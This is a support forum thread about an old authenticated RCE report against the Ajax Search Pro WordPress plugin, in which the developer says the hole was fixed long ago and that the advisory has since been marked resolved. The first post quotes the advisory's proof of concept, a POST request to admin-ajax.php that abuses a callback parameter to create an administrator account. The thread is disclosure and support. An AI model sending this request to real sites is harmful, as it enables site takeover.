Authenticated RCE Vulnerability Logged Not Closed

Home Forums Product Support Forums Ajax Search Pro for WordPress Support Authenticated RCE Vulnerability Logged Not Closed

This topic contains 3 replies, has 2 voices, and was last updated by Ernest Marcinko Ernest Marcinko 5 years, 7 months ago.

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • #11068
    OddenCreative
    OddenCreative
    Participant

    I would like to get a status update regarding this potential exploit… I just purchased this Plugin and was starting to configure when I got an alert about a potential exploit.

    An Authentication RCE vulnerability was reported on this plugin

    ajax-search-pro 4.9.8 – 0 more info

    https://wpvulndb.com/plugins/ajax-search-pro

    https://wpvulndb.com/vulnerabilities/7859

    Ajax Search Pro – Authenticated RCE

    Sign up to our free email alerts service for instant vulnerability notifications!

    Description
    Affected versions unknown.

    Proof of Concept:

    This will register an administrator with username “xADMIN” and password “xPASS”:

    POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

    With POST data:
    wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
    Affects

    Plugin ajax-search-pro
    References

    PACKETSTORM 130955
    URL http://web.archive.org/web/20150619084745/http://research.evex.pw/?vuln=9
    Classification

    Type RCE
    OWASP Top 10 A1: Injection
    CWE CWE-94
    Miscellaneous

    Submitter A. Samman
    Submitter Twitter Evex_1337
    Views 350
    Verified No
    WPVDB ID 7859
    Timeline

    Publicly Published 2015-03-18 (over 1 year ago)
    Added 2015-03-21 (over 1 year ago)
    Last Updated 2016-04-24 (7 months ago)

    Copyright & License

    Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
    License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.

    #11069
    Ernest Marcinko
    Ernest Marcinko
    Keymaster

    Hi,

    It has been fixed a very long time ago, they messaged me before publishing the report so a fix was released before that.

    Best,
    Ernest Marcinko

    If you like my products, don't forget to rate them on codecanyon :)


    #11086
    OddenCreative
    OddenCreative
    Participant

    Perhaps you can submit a note back to them so that they can mark it fixed, and close it. I know that if the next developer/admin comes along to check logs and sees that flagged, they will likely contact you, too.

    We run clean green on our servers. A vulnerability or exploit mark is typically grounds for removal, or we look to help fix them.

    Thanks for replying so quickly!

    #11088
    Ernest Marcinko
    Ernest Marcinko
    Keymaster

    Hi!

    I’ve sent a message again, and they already marked it as resolved 🙂
    Thanks for notfying me, I thought this was done a long time ago.

    Best,
    Ernest Marcinko

    If you like my products, don't forget to rate them on codecanyon :)


Viewing 4 posts - 1 through 4 (of 4 total)

You must be logged in to reply to this topic.